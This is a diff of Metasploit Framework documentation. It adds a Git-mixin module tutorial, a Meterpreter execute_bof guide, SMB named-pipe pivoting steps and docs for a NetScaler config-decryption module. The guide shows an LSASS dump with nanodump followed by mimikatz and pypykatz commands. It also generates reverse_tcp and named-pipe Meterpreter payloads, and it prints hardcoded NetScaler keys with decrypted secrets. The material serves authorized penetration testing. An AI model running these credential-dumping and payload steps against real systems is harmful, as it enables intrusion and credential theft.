+can happen there:
+
+```ruby
+  # Creates a random uri for the Git repo, ensuring that there are no spaces
+  def create_git_uri
+    "/#{Faker::App.name.downcase}.git".gsub(' ', '-')
+  end
+
+  # Uses GIT_URI datastore option or randomly generates a repo URI
+  # Registers the URI with the http server and prints the entire path that client should pass to git clone
+  def primer
+    @git_repo_uri = datastore['GIT_URI'].empty? ? create_git_uri : datastore['GIT_URI']
+    @git_addr = URI.parse(get_uri).merge(@git_repo_uri)
+    print_status("Git repository to clone: #{@git_addr}")
+    hardcoded_uripath(@git_repo_uri)
+  end
+```
+
+Next, the `exploit()` method can be used to set up the repository.
+The code used in the `Building a Repository` section can be placed here
+before entering the listen / accept loop.
+
+The `on_request_uri()` method is where most of the module logic will live.
+No matter what the client sends, the request should first be parsed
+by `Msf::Exploit::Git::SmartHttp::Request.parse_raw_request()`.
+The `parse_raw_request()` method will format the request so it is easier to work with.
+The first request that a client will send when cloning a repository is a reference
+discovery request. The client will expect things like server capabilities and the
+reference that `HEAD` points to in the response. Since this is a simple repo only one
+branch will exist, so `HEAD` will point to `refs/heads/master` and `refs/heads/master`
+will point to the latest commit in the repo, which in this case is the only commit
+in the repo. This can be represented as the following hash:
+
+```ruby
+refs =
+{
+	'HEAD' => 'refs/heads/master',
+	'refs/heads/master' => commit_object.sha1
+}
+```
+
+Creating a proper response to a `ref-discovery` request is done through
+`Msf::Exploit::Git::SmartHttp.get_ref_discovery_response()`. It takes two parameters:
+The request object from `parse_raw_request()` and the above `refs` hash.
+After the response is built, it can be sent back to the client.:
+
+```ruby
+response = get_ref_discovery_response(request, @refs)
+cli.send_response(response)
+```
+
+If the client successfully receives the `ref-discovery` response,
+it will then send an `upload-pack` request. The `upload-pack` request is a `POST`
+request containing the client's capabilities and a 'want' list for objects in
+the repository. To create a proper response, the `Msf::Exploit::Git::SmartHttp.get_upload_pack_response()`
+method should be used. Again, this method accepts two arguments. The first is the
+parsed request from the client, and the second is an array of all objects that exist
+in the repo. The `get_upload_pack_response()` method will check the sha1 hash of
+each object against the hashes in the want list that the client sent and send only
+the requested object hashes.
+
+```ruby
+response = get_upload_pack_response(request, @git_objs)
+cli.send_response(response)
+```
+
+Upon receiving the `upload-pack` response from the server,
+the client will build out the repository.
+
+Putting it all together, the module should look something like the following:
+
+```ruby
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Git
+  include Msf::Exploit::Git::SmartHttp
+  include Msf::Exploit::Remote::HttpServer
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Git Clone Test',
+        'Description' => %q{
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [ ],
+        'References' => [ ],
+        'DisclosureDate' => '2022-09-22',
+        'Platform' => [ 'unix' ],
+        'Arch' => ARCH_CMD,
+        'Targets' => [
+          [ 'Automatic Target', {}]
+        ],
+        'DefaultTarget' => 0,
+        'Notes' => {}
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('GIT_URI', [ false, 'The URI to use as the malicious Git instance (empty for random)', '' ])
+      ]
+    )
+
+    deregister_options('RHOSTS', 'RPORT')
+  end
+
+  def exploit
+    setup_repo_structure
+    super
+  end
+
+  def setup_repo_structure
+    # create blob object for contents of 'test_file.txt'
+    contents = "test\n"
+    blob = Msf::Exploit::Git::GitObject.build_blob_object(contents)
+
+    # create tree object representing 'test_file.txt' in 'dir' folder
+    tree_entry =
+    {
+      mode: '100644',
+      file_name: 'test_file.txt',
+      sha1: blob.sha1
+    }
+    tree_object = Msf::Exploit::Git::GitObject.build_tree_object(tree_entry)
+
+    # create blob object for contents of 'file.txt'
+    contents = "some text\n"
+    file_blob = Msf::Exploit::Git::GitObject.build_blob_object(contents)
+
+    # create tree object representing top-level directory of repo
+    entries =
+    [
+      {
+        mode: '100644',
+        file_name: 'file.txt',
+        sha1: file_blob.sha1
+      },
+      {
+        mode: '040000',
+        file_name: 'dir',
+        sha1: tree_object.sha1
+      }
+    ]
+    top_level_obj = Msf::Exploit::Git::GitObject.build_tree_object(entries)
+
+    # create commit
+    commit_object = Msf::Exploit::Git::GitObject.build_commit_object(tree_sha1: top_level_obj.sha1)
+
+    # create list of objects in repository, as the
+    # client will request them to build the repository
+    @git_objs =
+      [
+        commit_object, top_level_obj, tree_object,
+        file_blob, tree_object, blob
+      ]
+
+    @refs =
+      {
+        'HEAD' => 'refs/heads/master',
+        'refs/heads/master' => commit_object.sha1
+      }
+  end
+
+  def create_git_uri
+    "/#{Faker::App.name.downcase}.git".gsub(' ', '-')
+  end
+
+  def primer
+    @git_repo_uri = datastore['GIT_URI'].empty? ? create_git_uri : datastore['GIT_URI']
+    @git_addr = URI.parse(get_uri).merge(@git_repo_uri)
+    print_status("Git repository to clone: #{@git_addr}")
+    hardcoded_uripath(@git_repo_uri)
+  end
+
+  def on_request_uri(cli, req)
+    request = Msf::Exploit::Git::SmartHttp::Request.parse_raw_request(req)
+    case request.type
+    when 'ref-discovery'
+      response = get_ref_discovery_response(request, @refs)
+      fail_with(Failure::UnexpectedReply, 'Git client did not send a valid ref-discovery request') unless response
+    when 'upload-pack'
+      response = get_upload_pack_response(request, @git_objs)
+      fail_with(Failure::UnexpectedReply, 'Git client did not send a valid upload-pack request') unless response
+    else
+      fail_with(Failure::UnexpectedReply, 'Git client did not send a valid request')
+    end
+
+    cli.send_response(response)
+  end
+end
+```
+
+### Running the module
+
+The module will start the http server and print the repo to clone
+
+```
+msf6 > use exploit/multi/http/git_clone_test
+[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
+msf6 exploit(multi/http/git_clone_test) > set srvport 9999
+srvport => 9999
+msf6 exploit(multi/http/git_clone_test) > set lhost 192.168.140.1
+lhost => 192.168.140.1
+msf6 exploit(multi/http/git_clone_test) > set srvhost 192.168.140.1
+srvhost => 192.168.140.1
+msf6 exploit(multi/http/git_clone_test) > run
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+
+msf6 exploit(multi/http/git_clone_test) > [*] Started reverse TCP handler on 192.168.140.1:4444 
+[*] Using URL: http://192.168.140.1:9999/MOYuJfC
+[*] Server started.
+[*] Git repository to clone: http://192.168.140.1:9999/y-find.git
+```
+
+Once the repository is cloned, you should expect to see the same contents as the `test-repo` at the beginning of this document:
+
+```
+space@ubuntu:~$ git clone http://192.168.140.1:9999/y-find.git
+Cloning into 'y-find'...
+remote: Enumerating objects: 6, done.
+remote: Counting objects: 100% (6/6), done.
+remote: Compressing objects: 100% (6/6), done.
+remote: Total 6 (delta 0), reused 0 (delta 0), pack-reused 0
+Unpacking objects: 100% (6/6), 401 bytes | 200.00 KiB/s, done.
+space@ubuntu:~$ cd y-find
+space@ubuntu:~/y-find$ ls -al
+total 20
+drwxrwxr-x  4 space space 4096 Sep 22 12:05 .
+drwxr-x--- 22 space space 4096 Sep 22 12:05 ..
+drwxrwxr-x  2 space space 4096 Sep 22 12:05 dir
+-rw-rw-r--  1 space space   10 Sep 22 12:05 file.txt
+drwxrwxr-x  8 space space 4096 Sep 22 12:05 .git
+space@ubuntu:~/y-find$ cat dir/test_file.txt 
+test
+space@ubuntu:~/y-find$ cat file.txt
+some text
+```
+
+[1]: https://github.com/rapid7/metasploit-framework/blob/b1a6d9d30778bed11276ac8685f88d0a4dc98e19/lib/msf/core/exploit/git.rb
+[2]: https://github.com/rapid7/metasploit-framework/blob/b1a6d9d30778bed11276ac8685f88d0a4dc98e19/lib/msf/core/exploit/git/smart_http.rb
+[3]: https://git-scm.com/docs/http-protocol
@@ -0,0 +1,154 @@
+This guide outlines how to use the Meterpreter `execute_bof` command as provided by the `bofloader` extension. It allows
+a Meterpreter session to execute "Beacon Object Files" or BOF files for short. A BOF is a
+[Common Object File Format][1] (COFF) executable file with an API of standard functions defined in [beacon.h][2].
+
+The `bofloader` extension is only available for the Windows native Meterpreter, i.e. it is unavailable in the Java
+Meterpreter even when running on the Windows platform.
+
+# Execution Environment
+**Warning:** The execution environment is shared with the Meterpreter process. If there is an exception or the BOF
+crashes, the Meterpreter session will die. It is suggested that users invoke this functionality through a dedicated
+session to avoid losing access altogether.
+
+The loader and execution environment are provided by [trustedsec/COFFLoader][3]. The extension is therefor subject to
+the same limitations.
+
+The following functions are unavailable:
+
+* `BeaconDataPtr`
+* `BeaconUseToken`<sup>1</sup>
+* `BeaconRevertToken`<sup>1</sup>
+* `BeaconIsAdmin`
+* `BeaconInjectProcess`
+* `BeaconInjectTemporaryProcess`
+
+<sup>1</sup> The token functions are defined and present, but will only effect the execution of the BOF and not the
+Meterpreter runtime environment.
+
+Currently, there is only one output stream. All output data processed by `BeaconOutput` and `BeaconPrintf` is combined
+into that stream. BOFs should not use this for outputting binary data.
+
+# Usage
+The `bofloader` extension provides exactly one command, through which all of the provided functionality is accessed.
+
+`execute_bof </path/to/bof_file> [Options] -- [BOF Arguments]`
+
+
+
+* `-c` / `--compile` -- Compile the input file (requires mingw).
+* `-e` / `--entry` -- The entry point (default: `go`).
+* `-f` / `--format-string` -- Argument format-string. See details below.
+
+## Compile
+The compile option will use a local mingw instance to compile the input file into a COFF file for execution. The
+standard [beacon.h][2] file will be in the include path automatically. In this case, the input file is treated as a C
+source file instead of compiled data.
+
+## Entry Point
+Once loaded the loader will call the BOF entry point. By default, this value is `go`. The entry point option can change
+it to another valid function to call instead.
+
+## Argument Format-String
+The `execute_bof` command is capable of serializing arguments to be sent to the BOF for execution. The user must define
+the data type of each argument that the BOF file expecting to see. This information would come from either reading the
+BOF's documentation or source code. **Incorrectly specifying the arguments or omitting them entirely can result in the
+BOF crashing and the Meterpreter session dying.**
+
+BOF argument types are defined in the format string argument with `-f` / `--format-string`.
+
+The following table describes each of the types.
+
+| Type    | Description                                                     | Unpack With (C)               |
+| --------|-----------------------------------------------------------------|-------------------------------|
+| b       | binary data (e.g. 01020304, file:/path/to/file.bin)<sup>1</sup> | BeaconDataExtract             |
+| i       | 32-bit integer (e.g. 0x1234, 5678)<sup>2</sup>                  | BeaconDataInt                 |
+| s       | 16-bit integer (e.g. 0x1234, 5678)<sup>2</sup>                  | BeaconDataShort               |
+| z       | null-terminated utf-8 string                                    | BeaconDataExtract             |
+| Z       | null-terminated utf-16 string                                   | (wchar_t *)BeaconDataExtract  |
+
+<sup>1</sup> Binary data arguments are specified as either a stream of hex characters or as the path to a file local to
+the Metasploit Framework instance. In the case of a file path, it must be prefixed with `file:`.
+
+<sup>2</sup> Integer arguments are specified as either decimal or hexadecimal literals.
+
+Unknown arguments are treated as BOF arguments. Additionally, any arguments after the `--` terminator are explicitly
+treated as BOF arguments. Using the terminator allows ambiguous arguments to such as `--help` to be forward to the BOF
+instead of being processed locally. The number of BOF arguments to be forward must equal number of characters in the
+argument format string.
+
+# Usage Examples
+Executing [dir][4], passing the path argument and number of sub-directories to list.
+
+```
+meterpreter > execute_bof CS-Situational-Awareness-BOF/SA/dir/dir.x64.o --format-string Zs C:\\ 0
+Contents of C:\*:
+	08/05/2022 15:17           <dir> $Recycle.Bin
+	08/05/2022 15:16      <junction> Documents and Settings
+	09/22/2022 08:35      1342177280 pagefile.sys
+	08/05/2022 16:48           <dir> PerfLogs
+	09/08/2022 12:51           <dir> Program Files
+	09/15/2018 05:06           <dir> Program Files (x86)
+	08/05/2022 15:26           <dir> ProgramData
+	09/07/2022 10:24           <dir> Python27
+	08/05/2022 15:16           <dir> Recovery
+	08/05/2022 15:40           <dir> System Volume Information
+	08/05/2022 15:16           <dir> Users
+	09/01/2022 13:49           <dir> Windows
+	                      1342177280 Total File Size for 1 File(s)
+	                                                     11 Dir(s)
+
+meterpreter > 
+```
+
+Executing [nanodump][5]. First the PID of LSASS is found, then the argument string is constructed. The output must be
+written to disk. Once completed, the dump file can be downloaded from the remote host.
+
+```
+meterpreter > ps lsass
+Filtering on 'lsass'
+
+Process List
+============
+
+ PID  PPID  Name       Arch  Session  User                 Path
+ ---  ----  ----       ----  -------  ----                 ----
+ 712  556   lsass.exe  x64   0        NT AUTHORITY\SYSTEM  C:\Windows\System32\lsass.exe
+
+meterpreter > execute_bof nanodump.x64.o --format-string iziiiiiiiiziiiz 712 nanodump.dmp 1 1 0 0 0 0 0 0 "" 0 0 0 ""
+Done, to download the dump run:
+download nanodump.dmp
+to get the secretz run:
+python3 -m pypykatz lsa minidump nanodump.dmp
+mimikatz.exe "sekurlsa::minidump nanodump.dmp" "sekurlsa::logonPasswords full" exit
+meterpreter > download nanodump.dmp 
+[*] Downloading: nanodump.dmp -> /mnt/hgfs/vmshare/nanodump.dmp
+[*] Downloaded 1.00 MiB of 11.56 MiB (8.65%): nanodump.dmp -> /mnt/hgfs/vmshare/nanodump.dmp
+[*] Downloaded 2.00 MiB of 11.56 MiB (17.31%): nanodump.dmp -> /mnt/hgfs/vmshare/nanodump.dmp
+[*] Downloaded 3.00 MiB of 11.56 MiB (25.96%): nanodump.dmp -> /mnt/hgfs/vmshare/nanodump.dmp
+[*] Downloaded 4.00 MiB of 11.56 MiB (34.62%): nanodump.dmp -> /mnt/hgfs/vmshare/nanodump.dmp
+[*] Downloaded 5.00 MiB of 11.56 MiB (43.27%): nanodump.dmp -> /mnt/hgfs/vmshare/nanodump.dmp
+[*] Downloaded 6.00 MiB of 11.56 MiB (51.92%): nanodump.dmp -> /mnt/hgfs/vmshare/nanodump.dmp
+[*] Downloaded 7.00 MiB of 11.56 MiB (60.58%): nanodump.dmp -> /mnt/hgfs/vmshare/nanodump.dmp
+[*] Downloaded 8.00 MiB of 11.56 MiB (69.23%): nanodump.dmp -> /mnt/hgfs/vmshare/nanodump.dmp
+[*] Downloaded 9.00 MiB of 11.56 MiB (77.89%): nanodump.dmp -> /mnt/hgfs/vmshare/nanodump.dmp
+[*] Downloaded 10.00 MiB of 11.56 MiB (86.54%): nanodump.dmp -> /mnt/hgfs/vmshare/nanodump.dmp
+[*] Downloaded 11.00 MiB of 11.56 MiB (95.2%): nanodump.dmp -> /mnt/hgfs/vmshare/nanodump.dmp
+[*] Downloaded 11.56 MiB of 11.56 MiB (100.0%): nanodump.dmp -> /mnt/hgfs/vmshare/nanodump.dmp
+[*] download   : nanodump.dmp -> /mnt/hgfs/vmshare/nanodump.dmp
+meterpreter > 
+```
+
+# References
+
+* [hstechdocs.helpsystems.com/manuals/cobaltstrike][6] for Cobalt Strike's BOF documentation
+* [beacon.h][2] source code for the BOF API
+* [TrustedSec/COFFLoader][3] for the source code of the loader
+* [trustedsec/CS-Situational-Awareness-BOFF][7] for a collection of useful BOFs
+
+[1]: https://en.wikipedia.org/wiki/COFF
+[2]: https://github.com/Cobalt-Strike/bof_template/blob/4a5009fc4adeb35bb1b1887da478280f12f9693a/beacon.h
+[3]: https://github.com/TrustedSec/COFFLoader
+[4]: https://github.com/trustedsec/CS-Situational-Awareness-BOF/tree/master/src/SA/dir
+[5]: https://github.com/helpsystems/nanodump
+[6]: https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/beacon-object-files_main.htm
+[7]: https://github.com/trustedsec/CS-Situational-Awareness-BOF
@@ -30,6 +30,33 @@ Download the [latest Windows installer](https://windows.metasploit.com/metasploi

 If you downloaded Metasploit from us, there is no cause for alarm.  We pride ourselves on offering the ability for our customers and followers to have the same toolset that the hackers have so that they can test systems more accurately.  Because these (and the other exploits and tools in Metasploit) are identical or very similar to existing malicious toolsets, they can be used for nefarious purposes, and they are often flagged and automatically removed by antivirus programs, just like the malware they mimic.

+### Windows silent installation
+
+The PowerShell below will download and install the framework, and is suitable for automated Windows deployments. Note that, the installer will be downloaded to `$DownloadLocation` and won't be deleted after the script has run.
+```
+[CmdletBinding()]
+Param(
+    $DownloadURL = "https://windows.metasploit.com/metasploitframework-latest.msi",
+    $DownloadLocation = "$env:APPDATA/Metasploit",
+    $InstallLocation = "C:\Tools",
+    $LogLocation = "$DownloadLocation/install.log"
+)
+
+If(! (Test-Path $DownloadLocation) ){
+    New-Item -Path $DownloadLocation -ItemType Directory
+}
+
+If(! (Test-Path $InstallLocation) ){
+    New-Item -Path $InstallLocation -ItemType Directory
+}
+
+$Installer = "$DownloadLocation/metasploit.msi"
+
+Invoke-WebRequest -UseBasicParsing -Uri $DownloadURL -OutFile $Installer
+
+& $Installer /q /log $LogLocation INSTALLLOCATION="$InstallLocation"
+```
+
 ## Improving these installers

 Feel free to review and help improve [the source code for our installers](https://github.com/rapid7/metasploit-omnibus).
@@ -1,4 +1,5 @@
-# Overview of Pivoting And Its Benefits
+## Overview
+
 Whilst in test environments one is often looking at flat networks that only have one subnet and one network environment, the reality is that when it comes to pentests that are attempting to compromise an entire company, you will often have to deal with multiple networks, often with switches or firewalls in-between that are intended to keep these networks separate from one another.

 In order for pivoting to work, you must have compromised a host that is connected to two or more networks. This usually means that the host has two or more network adapters, whether that be physical network adapters, virtual network adapters, or a combination of both.
@@ -7,11 +8,14 @@ Once you have compromised a host that has multiple network adapters you can then

 Now that we understand some of the background, lets see this in action a bit more by setting up a sample environment and walking through some of Metasploit's pivoting features.

-# A Quick Note Before Continuing
+## Supported Session Types
+
 Pivoting functionality is provided by all Meterpreter and SSH sessions that occur over TCP channels. Whilst Meterpreter is mentioned below, keep in mind that this would also work with an SSH session as well. We have just resorted to using Meterpreter for this example for demonstration purposes.

-# Testing Pivoting
-## Target Environment Setup
+## Testing Pivoting
+
+### Target Environment Setup
+
 - Kali Machine
 	- Internal: None
 	- External: 172.19.182.171
@@ -153,7 +157,7 @@ IPv4 Active Routing Table
 msf6 post(multi/manage/autoroute) >
 ```

-# Using the Pivot
+## Using the Pivot
 At this point we can now use the pivot with any Metasploit modules as shown below:

 ```
@@ -210,11 +214,80 @@ msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce)
 [*] 169.254.204.110:443 - The target is not exploitable. Exchange Server 15.2.986.14 does not appear to be a vulnerable version!
 msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) >
 ```
-# Pivoting External Tools
-## portfwd
+
+## SMB Named Pipe Pivoting in Meterpreter
+
+The Windows Meterpreter payload supports lateral movement in a network through SMB Named Pipe Pivoting. No other Meterpreters/session types support this functionality.
+
+First open a Windows Meterpreter session to the pivot machine:
+
+```
+msf6 > use payload/windows/x64/meterpreter/reverse_tcp
+smsf6 payload(windows/x64/meterpreter/reverse_tcp) > set lhost 172.19.182.171
+lhost => 172.19.182.171
+msf6 payload(windows/x64/meterpreter/reverse_tcp) > set lport 4578
+lport => 4578
+msf6 payload(windows/x64/meterpreter/reverse_tcp) > to_handler
+[*] Payload Handler Started as Job 0
+
+[*] Started reverse TCP handler on 172.19.182.171:4578 
+msf6 payload(windows/x64/meterpreter/reverse_tcp) > [*] Sending stage (200774 bytes) to 172.19.185.34
+[*] Meterpreter session 1 opened (172.19.182.171:4578 -> 172.19.185.34:49674) at 2022-06-09 13:23:03 -0500
+```
+
+Create named pipe pivot listener on the pivot machine, setting `-l` to the pivot's bind address:
+
+```
+msf6 payload(windows/x64/meterpreter/reverse_tcp) > sessions -i -1
+[*] Starting interaction with 1...
+
+meterpreter > pivot add -t pipe -l 169.254.16.221 -n msf-pipe -a x64 -p windows
+[+] Successfully created pipe pivot.
+meterpreter > background
+[*] Backgrounding session 1...
+```
+
+Now generate a separate payload that will connect back through the pivot machine. This payload will be executed on the final target machine.  Note there is no need to start a handler for the named pipe payload.
+
+```
+msf6 payload(windows/x64/meterpreter/reverse_named_pipe) > show options
+
+Module options (payload/windows/x64/meterpreter/reverse_named_pipe):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   PIPEHOST  .                yes       Host of the pipe to connect to
+   PIPENAME  msf-pipe         yes       Name of the pipe to listen on
+
+msf6 payload(windows/x64/meterpreter/reverse_named_pipe) > set pipehost 169.254.16.221
+pipehost => 169.254.16.221
+msf6 payload(windows/x64/meterpreter/reverse_named_pipe) > generate -f exe -o revpipe_meterpreter_msfpipe.exe
+[*] Writing 7168 bytes to revpipe_meterpreter_msfpipe.exe...
+```
+
+After running the payload on the final target machine a new session will open, via the Windows 11 169.254.16.221 pivot.
+```
+msf6 payload(windows/x64/meterpreter/reverse_named_pipe) > [*] Meterpreter session 2 opened (Pivot via [172.19.182.171:4578 -> 169.254.16.221:49674]) at 2022-06-09 13:34:32 -0500
+
+msf6 payload(windows/x64/meterpreter/reverse_named_pipe) > sessions
+
+Active sessions
+===============
+
+  Id  Name  Type                     Information                                Connection
+  --  ----  ----                     -----------                                ----------
+  1         meterpreter x64/windows  WIN11\msfuser @ WIN11          172.19.182.171:4578 -> 172.19.185.34:49674 (172.19.185.34)
+  2         meterpreter x64/windows  WIN2019\msfuser @ WIN2019      Pivot via [172.19.182.171:4578 -> 172.19.185.34:49674]
+                                                                                 (169.254.204.110)
+
+```
+## Pivoting External Tools
+
+### portfwd
 *Note: This method is discouraged as you can only set up a mapping between a single port and another target host and port, so using the socks module below is encouraged where possible. Additionally this method has been depreciated for some time now.*

-### Local Port Forwarding
+#### Local Port Forwarding
 To set up a port forward using Metasploit, use the `portfwd` command within a supported session's console such as the Meterpreter console. Using `portfwd -h` will bring up a help menu similar to the following:

 ```
@@ -262,7 +335,7 @@ Connecting to 127.0.0.1:443... failed: Connection refused.

 Note that you may need to edit your `/etc/hosts` file to map IP addresses to given host names to allow things like redirects to redirect to the right hostname or IP address when using this method of pivoting.

-### Listing Port Forwards and Removing Entries
+#### Listing Port Forwards and Removing Entries
 Can list port forwards using the `portfwd list` command. To delete all port forwards use `portfwd flush`. Alternatively to selectively delete local port forwarding entries, use `portfwd delete -l <local port>`.

 ```
@@ -275,7 +348,7 @@ No port forwards are currently active.
 meterpreter >
 ```

-### Remote Port Forwarding
+#### Remote Port Forwarding
 This scenario is a bit different than above. Whereas previously we were instructing the session to forward traffic from our host running Metasploit, through the session, and to a second target host, with reverse port forwarding the scenario is a bit different. In this case we are instructing the session to forward traffic from other hosts through the session, and to our host running Metasploit. This is useful for allowing other applications running within a target network to interact with local applications on the machine running Metasploit.

 To set up a reverse port forward, use `portfwd add -R` within a supported session and then specify the `-l`, `-L` and `-p` options. The `-l` option specifies the port to forward the traffic to, the `-L` option specifies the IP address to forward the traffic to, and the `-p` option specifies the port to listen on for traffic on the machine that we have a session on (whose session console we are currently interacting with).
@@ -211,6 +211,10 @@ NAVIGATION_CONFIG = [
                path: 'Meterpreter-Debugging-Meterpreter-Sessions.md',
                title: without_prefix('Meterpreter ')
              },
+              {
+                path: 'Meterpreter-ExecuteBof-Command.md',
+                title: without_prefix('Meterpreter ')
+              },
              {
                path: 'How-to-get-started-with-writing-a-Meterpreter-script.md'
              },
@@ -268,13 +272,17 @@ NAVIGATION_CONFIG = [
            nav_order: 1
          },
          {
-            path: 'dev/Setting-Up-a-Metasploit-Development-Environment.md',
+            path: 'Creating-Your-First-PR.md',
            nav_order: 2
          },
          {
-            path: 'Sanitizing-PCAPs.md',
+            path: 'dev/Setting-Up-a-Metasploit-Development-Environment.md',
            nav_order: 3
          },
+          {
+            path: 'Sanitizing-PCAPs.md',
+            nav_order: 4
+          },
          {
            old_wiki_path: "Navigating-and-Understanding-Metasploit's-Codebase.md",
            path: 'Navigating-and-Understanding-Metasploits-Codebase.md',
@@ -434,6 +442,10 @@ NAVIGATION_CONFIG = [
                path: 'How-to-use-PhpEXE-to-exploit-an-arbitrary-file-upload-bug.md',
                title: 'PhpExe'
              },
+              {
+                path: 'How-to-use-the-Git-mixin-to-write-an-exploit-module.md',
+                title: 'Git Mixin'
+              },
              {
                title: 'HTTP',
                folder: 'http',
@@ -0,0 +1,212 @@
+This module takes a Citrix NetScaler `ns.conf` configuration file as input and extracts secrets that
+have been stored with reversible encryption. The module supports legacy NetScaler encryption (RC4)
+as well as the newer AES-256-ECB and AES-256-CBC encryption types. It is also possible to decrypt
+secrets protected by the Key Encryption Key (KEK) method, provided the key fragment files F1.key
+and F2.key are provided. Currently, keys for appliances in FIPS mode or running hardware HSM cannot 
+be extracted. Root access to a NetScaler device or access to a NetScaler configuration backup are
+the most effective means of acquiring the configuration file and key fragments.
+
+This module incorporates research published by dozer:
+
+https://dozer.nz/posts/citrix-decrypt/
+
+## Vulnerable Application
+This module is tested against the configuration files for NetScaler versions 10.x, 11x, 12.x and
+13.x. The module will work with files retrieved from a live NetScaler system as well as files
+extracted from an unencrypted NetScaler backup archive. This is possible because NetScaler uses
+well-known hard coded encryption keys which are visible on the system in the hidden file:
+
+`/nsconfig/.skf`
+
+These static keys are:
+
+```
+NetScaler RC4:
+  2286da6ca015bcd9b7259753c2a5fbc2
+NetScaler AES:
+  351cbe38f041320f22d990ad8365889c7de2fcccae5a1a8707e21e4adccd4ad9
+```
+The module is also able to decrypt secrets encrypted with NetScaler KEK, provided the associated
+`F1.key` and `F2.key` fragments are provided. Private key passphrases that use `-passcrypt` are not
+currently decryptable by this module, but any secret that uses the `-encrypted` parameter should be
+fully recoverable.
+
+## Verification Steps
+You must possess a NetScaler `ns.conf` file in order to use this module. If the NetScaler is running
+NS13.0 Build76.xx.nc or higher, or the administrator has configured KEK encryption, you must also
+possess the associated KEK key fragments in order to decrypt the file. All files must be local to
+the system invoking the module. Where possible, you should provide the `NS_IP` option to tag
+relevant loot entries with the IPv4 address of the originating system. If no value is provided for
+`NS_IP` the module defaults to assigning the loopback IP `127.0.0.1`.
+
+1. Acquire the `ns.conf` file, and associated `F1.key` and `F2.key` files if using NS KEK
+2. Start msfconsole
+3. Do: `modules/auxiliary/admin/citrix/citrix_netscaler_config_decrypt.rb`
+4. Do: `set ns_conf <path to ns.conf>` to provide the location of the NetScaler config file
+5. Do: `set ns_kek_f1 <path to f1.key>` if you are decrypting a file using NS KEK
+6. Do: `set ns_kek_f2 <path to f2.key>` if you are decrypting a file using NS KEK
+6. Do: `set ns_ip <NetScaler IPv4>` to attach the target NetScaler IPv4 address to loot entries
+7. Do: `dump`
+
+## Options
+### NS_CONF
+
+Path to the NetScaler configuration file on the local system. Example: `/tmp/ns.conf`
+
+### NS_KEK_F1
+
+Path to the first of two NS KEK fragments, if decrypting NS KEK. Example: `/tmp/F1.key`
+
+### NS_KEK_F2
+
+Path to the second  of two NS KEK fragments, if decrypting NS KEK. Example: `/tmp/F2.key`
+
+### NS_IP
+
+Optional parameter to set the IPv4 address associated with loot entries made by the module.
+
+## Scenarios
+
+### Acquire NetScaler Config File
+NetScaler configuration files can be retrieved from a live system by running
+
+`show ns.conf`
+
+From the nscli or
+
+`cat /nsconfig/ns.conf`
+
+from the BSD shell. These files can also be retrieved from NetScaler configuration backup
+archives which are generated from the appliance admin interface.
+
+### Acquire KEK Fragment Files
+As of NS13.0 Build76.xx.nc NetScaler requires mandatory use of the Key Encryption Key (KEK)
+scheme. If secrets within the config file use KEK, you must also posses the associated KEK F1
+and F2 fragment files in order to perform decryption. Secrets that require KEK fragments to
+decrypt will include the `-kek` parameter on the associated configuration line. It is possible
+for an admin to manually enable KEK in NS builds prior to Build76.xx.nc - if this has been done,
+the current KEK key fragments are located in the following paths:
+
+`/nsconfig/F1.key`
+`/nsconfig/F2.key`
+
+After NS13.0 Build76.xx.nc, KEK is mandatory and managed by the NetScaler itself. Key fragments
+are presumably regenerated during firmware upgrades, and a journal is maintained in `/nsconfig/keys`
+suffixed with a date stamp. The `F1.key` and `F2.key` files are ignored, and the new "current" KEK
+key is stored in hidden files at paths:
+
+`/nsconfig/.F1.key`
+`/nsconfig/.F2.key`
+
+As well as under `/nsconfig/keys`. Note that both fragments must be provided for successful
+decryption. The module can be run without providing KEK fragments, but will be unable to decrypt
+any secrets that use KEK encryption. An unencrypted NetScaler backup archive will contain all KEK
+fragments currently defined on the appliance as well as the current `ns.conf` file.
+
+### Running the Module
+
+Example run against config file without KEK from NetScaler VPX running NS11.0 Build 62.10.nc:
+```
+msf6 > use modules/auxiliary/admin/citrix/citrix_netscaler_config_decrypt
+msf6 auxiliary(admin/citrix/citrix_netscaler_config_decrypt) > set ns_conf /tmp/ns.conf.NS11.0-62.10.conf
+ns_conf => /tmp/ns.conf.NS11.0-62.10.conf
+msf6 auxiliary(admin/citrix/citrix_netscaler_config_decrypt) > dump
+
+[*] Config line:
+add ssl certKey netscaler_cesium137_io -cert netscaler_cesium137_io.pem -key netscaler_cesium137_io.key -passcrypt "VbuAvo9nq18Zap0joBBv1a1Chm5BOerJ3GhYWU+Wbv0=" -expiryMonitor DISABLED
+[!] Not decrypting passcrypt entry:
+[!] Ciphertext: VbuAvo9nq18Zap0joBBv1a1Chm5BOerJ3GhYWU+Wbv0=
+[*] Config line:
+set ns encryptionParams -method AES256 -keyValue 7654526a2f3ceffd877b286a8acece43da700d06133dc985f7ebdeb076135bcb755472e04f5d92aba9f07334eb8e936a58782ce76bb3f6d6e44adf727e8e88d602b8bdae1817d26203fe281a8429574d -encrypted -encryptmethod ENCMTHD_3
+[+] Plaintext: AAAAAAXyju437Ecnb/iQpa55uUvOskx7S5hCq5dB4kMq+Lcx6g==
+[*] Config line:
+add authentication radiusAction UTIL1 -serverIP 10.100.10.13 -serverPort 1812 -radKey f8e4f532e9d4e6bebab169b3be9e77b5c851466b7760c469bd64a15d2e8d3c602025c41372094d06e207789d58b6acb7 -encrypted -encryptmethod ENCMTHD_3
+[+] Plaintext: hbZaADYDUmdHv7AhHsAb6eCde2M82m0
+[*] Config line:
